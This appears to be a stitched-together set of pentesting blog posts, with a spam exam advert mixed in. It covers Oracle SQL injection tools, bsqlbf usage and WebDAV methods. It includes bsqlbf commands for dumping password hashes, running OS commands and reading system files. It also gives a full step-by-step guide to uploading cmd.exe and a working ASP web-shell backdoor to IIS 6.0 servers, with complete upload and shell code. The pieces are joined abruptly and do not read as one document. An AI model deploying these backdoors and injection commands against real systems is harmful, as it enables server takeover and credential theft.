There are 3 demos to go with the slides:

Demo 1: Exploiting PL/SQL Injection from Web Applications.

Demo 2: Exploiting SQL Injection in Oracle Applications with Bsqlbf

Demo 3: A proof of concept of Oracle SQL Injection Worm

Tools: There are 2 tools shown in demos above:
1. Bsqlbf: Download from Project Homepage
2. OAP_Hacker.pl: Download Here

Enjoy!!
————————
Advert: Testking 1Y0-A06 questions and 1Y0-A08 practice test are enough to pass 70-448 exams on first attempt without any difficulty

-------------------
 -type:        Type of injection:

        3:      Type 3  is extracting data with DBA privileges
                 (e.g. Oracle password hashes from sys.user$)
        4:      Type 4 is O.S code execution(default: ping 127.0.0.1)
        5:      Type 5 is Reading O.S files(default: c:\boot.ini)
--------------------
Type 4 (O.S code execution) supports the following sub types:

 -stype:        How you want to execute command:

        0:      SType 0 (default) is based on java,
                universal but won't work against XE
        1:      SType 1 against oracle 9 with plsql_native_make_utility
        2:      SType 2 against oracle 10 with dbms_scheduler

———————-
Examples:

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match “true” -sql “select password from sys.user$ where rownum=1″

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match “true” -cmd “ping notsosecure.com”

./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match “true” -file “C:\boot.ini”

———————
Download from Project Homepage: http://code.google.com/p/bsqlbf-v2/
———————

All these additions are based on dbms_export_extension exploit. This will work against the following oracle versions:
Oracle 8.1.7.4, 9.2.0.1 – 9.2.0.7, 10.1.0.2 – 10.1.0.4, 10.2.0.1-10.2.0.2, XE

————————
Enjoy…

Download link

Sid

MS-SQL

MY-SQL

PostgreSQL

Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.  

It supports 2 modes of attack(-type):

Type 0: Blind SQL Injection based on True And Flase response

Type 1: Blind SQL Injection based on True And Error Response(details) 

Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"

Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Send Your feedbacks/suggestions to sid-at-notsosecure(dot)com 

———– 

Database Hackers Handbook.(David Litchfield)

Oracle Hacker's handbook (David Litchfield) 

Hacking Web Applications Exposed (TMH Publications)

Essential PHP Security (Chris Shifflett)

TCP/IP Illustrated (Comer).

Hacking Linux Exposed. 

——- 

As this list is really small, it is clear that i need to read more books. If you know any good book related to pentesting (or security in general) please share it with us.

In IIS 6.0 you can upload the backdoor scripts but u may not be able to execute the default cmd.exe present in the iis box, so u need to upload your own cmd.exe first and then make your asp backdoor point to the cmd.exe which you uploaded.

Steps:

1. Upload cmd.exe to /scripts/ folder: Use the script below published by http://www.eggheadcafe.com/articles/20010829.asp which will allow you to upload cmd.exe (or any other binary) to the vulnerable server. You may not be able to upload a .exe file, so rename cmd.exe to  cmd.txt and then use the move method to copy it back from cmd.txt to cmd.exe. Note that cmd.exe must be copied to the /scripts/ folder of IIS where you have by default execute privileges.

Here is the upload script: 

<script language=VBSCRIPT> dim strURL function sendit( sfileName, sType) sData = getFileBytes(sfileName, sType) sfileName= mid(sfileName, InstrRev(sFileName,"\")+1,len(sfileName)) dim xmlhttp set xmlhttp=createobject("MSXML2.XMLHTTP.3.0")
strURL = "http://victim.com/scripts/" & sFileName msgbox "URL is: " & strURL xmlhttp.Open "PUT", strURL, false xmlhttp.Send sData show.innerText= "Status: " & xmlhttp.statusText set xmlhttp=Nothing End function
sub showresult()
document.write "<CENTER>Take A look!<BR><A xhref=" & strURL & ">"& strURL & "</a></CENTER>"
end sub

<TABLE align=center>
<TR><TD><input type=FILE id=filedata ></TD></TR>
<TR><TD><input type=submit onclick="Call sendit( filedata.value, filetype.value)"></TD></TR>
<TR><TD><input type=checkBox id=filetype checked >Type Binary (Uncheck for Type Text)</TD></TR>
<TR><TD><input type=button value = "SHOW IT" onclick ="showresult()"></TD></TR>
</TABLE>
<div id=show align=center></div>

2.Upload the cmd.asp file to /scripts/ folder: Use the same upload script running locally on your system to upload the cmd.asp, from (http://www.unsec.net/2007/03/web_backdoor_jspshell_aspshell_1.html)  

<!– IIS6 VBscript command shell –>

<!– aramosf@unsec.net http://www.514.es –>

<title>514 aspshell</title> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="cmd" size=45 value="<%= cmd %>">
<input type=submit value="Run">
</FORM>
<%
If (request("cmd") <> "") Then
Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)
End If
%>

You need to make the script point to the cmd.exe you uploaded in the scripts folder. You will need the absolute path, so the line:

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec(Server.MapPath("cmd.exe")& " /c " &

request("cmd")).stdout.readall)

may look something like: 

Response.Write Server.HTMLEncode(server.createobject

("wscript.shell").exec("C:\Inetpub\Scripts\mycmd.exe /c " &

request("cmd")).stdout.readall)

You may not be able to upload the .asp file, so rename it as .txt and use the move method to copy it again as .asp on the server. That's it, job done, your backdoor should work fine now

- Questions:———————-

1. How to obtain the absolute path. add this line to your backdoor:

<%=Server.Mappath("/scripts/")%> 

This will give you the full path, make necessary changes to your backdoor and upload it again.

————————–

2. What if the scripts directory is not present?

I think the attack will fail as you wont have the execute permissions:

—————————

3. Is it a good practice to not have /scripts/ folder in the document root?

Think so.

———————–
'''Syntax:'''
———————-
 Example- PUT Method:

>>Request 

PUT /foo.txt HTTP/1.1

Host: www.victim.com

Content-Length: 4

test

>>Response 

HTTP/1.1 201 Created
Date: Thu, 14 Jun 2007 09:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.victim.com/foo.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   

————————

Example – DELETE

>>Request   

DELETE  /container/ HTTP/1.1   

Host: www.foo.bar

>>Response   

HTTP/1.1 207 Multi-Status    Content-Type: text/xml; charset="utf-8"    Content-Length: xxxx    <?xml version="1.0" encoding="utf-8" ?>    <d:multistatus xmlns:d="DAV:">      <d:response>           <d:href>http://www.foo.bar/container/resource3</d:href>           <d:status>HTTP/1.1 423 Locked</d:status>      </d:response>    </d:multistatus>

————-

Example- MOVE
>>Request

   MOVE /~fielding/index.html HTTP/1.1
   Host: www.ics.uci.edu
   Destination: http://www.ics.uci.edu/users/f/fielding/index.html

>>Response

   HTTP/1.1 201 Created
   Location: http://www.ics.uci.edu/users/f/fielding/index.html

————

More HTTP methods:http://www.webdav.org/specs/rfc2518.html
————

Another feature why i like this tool is for the inbuilt fuzzing module. Just specify the parameter in the request which you want to fuzz and point to the file containing the values, which you would like the paramter to take. Then use the ‘compare’ section to compare different responses and this should indicate whether fuzzing was successful or not. Although this also has a built in proxy feature, but i still prefer burp for proxy may be becuase of the better gui.

For the basic cookie analysis i use a firefox plugin. This plugin allows you to view all the cookies for a partciular domain currently set in your browser, and also allows you to edit them.

1. Proxy Tool: Parameter Manipulation is a very important stage of web app testing, and without this, the test will be incomplete. I was using tools like Paros and Achillies for achieveing this, but the problem with both of them was they were highly unstable and would crash every now and then. Thus if the customer has asked you to provide all the logs of testing, it would be difficult for you to provide logs if tools were to crash. I currently use Burp Suite. I find it is highly stable and comes with this feature of viewing request/response as text, parameter, and as hex. Viewing request and response as ‘param’ helps me particulary when dealing with asp .net applications becuase of the long value of viewstate and other .net stuff. Another interesting feature of Burp is the repeater module, which could be used to send modified requests to server multiple times. I use this feature mostly to figure out the ‘non essential’ parameters of the unmodified request and then to focus on the essential parametes. Best way to learn the capabilities of this tool is to download it and then play with it.